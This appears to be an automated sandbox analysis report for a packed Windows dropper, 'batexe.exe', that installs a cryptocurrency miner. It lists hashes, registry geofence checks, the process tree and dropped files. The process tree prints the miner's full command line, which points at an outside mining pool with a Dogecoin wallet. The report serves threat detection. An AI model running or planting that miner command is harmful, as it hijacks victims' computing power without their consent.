73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
293s
max time network
302s
platform
windows10-2004_x64
resource
win10v2004-20231222-ja
resource tags

arch:x64arch:x86image:win10v2004-20231222-jalocale:ja-jpos:windows10-2004-x64systemwindows
submitted
14/02/2024, 04:01

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\International\Geo\Nation	batexe.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\International\Geo\Nation	b2e.exe

Executes dropped EXE 2 IoCs

pid	Process
2812	b2e.exe
3760	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
3760	cpuminer-sse2.exe
3760	cpuminer-sse2.exe
3760	cpuminer-sse2.exe
3760	cpuminer-sse2.exe
3760	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/4268-7-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 4268 wrote to memory of 2812	4268	batexe.exe	85
PID 4268 wrote to memory of 2812	4268	batexe.exe	85
PID 4268 wrote to memory of 2812	4268	batexe.exe	85
PID 2812 wrote to memory of 4196	2812	b2e.exe	86
PID 2812 wrote to memory of 4196	2812	b2e.exe	86
PID 2812 wrote to memory of 4196	2812	b2e.exe	86
PID 4196 wrote to memory of 3760	4196	cmd.exe	89
PID 4196 wrote to memory of 3760	4196	cmd.exe	89

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4268
- C:\Users\Admin\AppData\Local\Temp\B8C1.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\B8C1.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\B8C1.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:2812
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BCE7.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4196
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:3760

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\B8C1.tmp\b2e.exe

Filesize
9.1MB

MD5
a97af40ec89bab099dfdaed9a14197fd

SHA1
2ce5555423105a103a6f37cbd104c7390306b177

SHA256
28d9e5696290334c5056d90cefe398119d92ed2b4e0ba7271169eeb12e95032c

SHA512
ac1ee551740014cc9827839470ebd141e02588d3c430d0f36b0a2226c3a16365c44c597ee8000501a849de3c27396e3f577fd4c0fcf655df9d8582c81b76d2c9

Download Submit
C:\Users\Admin\AppData\Local\Temp\B8C1.tmp\b2e.exe

Filesize
6.5MB

MD5
bdc9f939db6b241e08e23570d483db67

SHA1
df57f2ecf036240e960068c1f66644ed00ddb9cd

SHA256
16202071a3b9d27bd4854b58ecc1aea2fd7d1d4d1c3d8b0985d23c4df23fe10a

SHA512
051d40da4c4e504a29fb004fe9e208c5504a6748bfd8121c3c47ef8dec2fefdfd564f14cc8771f144f9ada081f0cac4d58a76a58b00550d976a7e405f37de35f

Download Submit
C:\Users\Admin\AppData\Local\Temp\B8C1.tmp\b2e.exe

Filesize
6.8MB

MD5
522e253c7de1e3aa127af1f0afc5ab38

SHA1
4c8234a4c032ae777c7bf088bc046ca7dc3cda90

SHA256
b5adb3e9e83004041809947bc8e3210b537828b070bca34a91d7eee99112173d

SHA512
c8961dcc9a030cc15ba8ba167fdfa36081dacf8a9bca79a1e405d6e60d7efce60e452ffb5fdcb79811e2420a45230a70502fb3beb2653ce356082e233f45b9d5

Download Submit
C:\Users\Admin\AppData\Local\Temp\BCE7.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
960KB

MD5
5f088febb9167d9fa27631de416c40d9

SHA1
0e7cfc61e5cd1bb82c846c939d71388e2f9d5086

SHA256
869740b99a3d66f9e9decc133d9c3c4a2c14c3e7c62c512248da76f002387fce

SHA512
65e4cd0d550b852f50e426e53ff47bf1419a5cc1aaf07010b10b96f392148525950fd11dd3b1e8acda0916d288414629cde845cdc959ed7092e565ccb8ffa920

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
1.1MB

MD5
510757f6e6edd1b4e6ab21bf19ffd8f4

SHA1
ea4454ce0d102b6acc1e2a7205512fa5fa5b45ef

SHA256
43031338da8f2f9ebc600a63230dbff223632004f03ff29fefbe58fd85946fab

SHA512
647b669e06a2f0377ab87aa7c2923c4852bfe8b559857452096d94a814b807628ab19aea9290557e4de8eda328c0c68cdb1d8b7caf6b0f3927355e759874df0d

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
836KB

MD5
aeab40ed9a8e627ea7cefc1f5cf9bf7a

SHA1
5e2e8ca2881b9bf9edfa3c4fdcec6da1efa102d8

SHA256
218cfc4073bab4eddf0de0804f96b204687311e20a9e97994bff54c9b0e01ee9

SHA512
c0a67616fa01fdc351015212a718faf70da6612fbb3ec13da28dd7af9a507c56882fb7c3eea6fbc37d4d63b970157199d16d0756dbe3cb3bc2223e215cb104d8

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
1.1MB

MD5
c92c77f1a0ac6f5dc252a0e6187d8345

SHA1
f7814840f3adb7a5f510c3cd772682d5542880d4

SHA256
2fc1c2da730cdbdf707f77739c0a6ccd5f598b75d7dcff31eed0f68549f1e043

SHA512
dcc271087d055c897b6f5ca858da460861a32f18100a211d794b57778f1c51b06f627e979ecb7e0c9fd06c2f41e4dbcfc168a21611810f867b14d033aab74111

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
1.1MB

MD5
d66aca9a9707c3fd97587adfc79af362

SHA1
49cdfa87013db4eb888b6f376fce0ee67854d5c6

SHA256
4a2fe88552cb2120bc7b7c55fb2ef4ef719c66e50d3088ed7ebee641f4b48792

SHA512
5654109f570903c691a7ae1ce3387b4bad1992f0d7a703f357a43c0781aff170b607011555db9b2e5a8386f11d35c07aadfb1005f3082ef1d7118384a53023b0

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
1.1MB

MD5
32dd90e138a9bcdada3d1e70c69ef316

SHA1
3914b4797c8740fc50ad7ba2362875a4543b5829

SHA256
5d6c7889debe6a5a3bd126a9b9589c87def9cc0a17c259f13fbdf429e8c38dd6

SHA512
9bead9b5a5df61899cffae1a8c0849a570fc0e211490509251d56709798d2f05727a743e59cf6273176a2bb1a7bb10d2a7eb4829cac75ec9b27db7d3745c0bd7

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
925KB

MD5
7bb54be2b1014eff6db81c13dbe52103

SHA1
ee2b5943d1b6a1d1efe760ef3cd6b692aceb4c74

SHA256
4671c637f0271d2ab183f92319a6e130f994a7a9a2f9716e01004f933c34e49b

SHA512
4be000d1fe892d898c38fbc30501314d1eda0769eca63b41a4170c7ec479df22612c5027e0b701fd6a2437541618daa171c6a482215ab0bf744a3f1c21e6daee

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
1.2MB

MD5
125d7df991f414089b0a460005285d21

SHA1
4c685830025a6278d6acabe3d38bcbc177b9fe79

SHA256
a2d61ea64895cde1692fd6b003d799d916a32a335728a22e8a7ca5076eb34194

SHA512
da0830eb09279fe23e6f4bc391ce891a3baf10acdee2461a6dcae5308497c770237d81096e375f72596c87999eb074dd80b2028b9051ea6016f3a6b646e81377

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
606KB

MD5
585efec1bc1d4d916a4402c9875dff75

SHA1
d209613666ccac9d0ddab29a3bc59aa00a0968fa

SHA256
2f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232

SHA512
b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770

Download Submit
memory/2812-53-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/2812-9-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/3760-48-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3760-54-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3760-45-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/3760-46-0x0000000073A60000-0x0000000073AF8000-memory.dmp

Filesize
608KB

Download
memory/3760-47-0x0000000001050000-0x0000000002905000-memory.dmp

Filesize
24.7MB

Download
memory/3760-99-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3760-43-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3760-44-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/3760-59-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3760-64-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3760-69-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3760-74-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3760-89-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3760-94-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4268-7-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download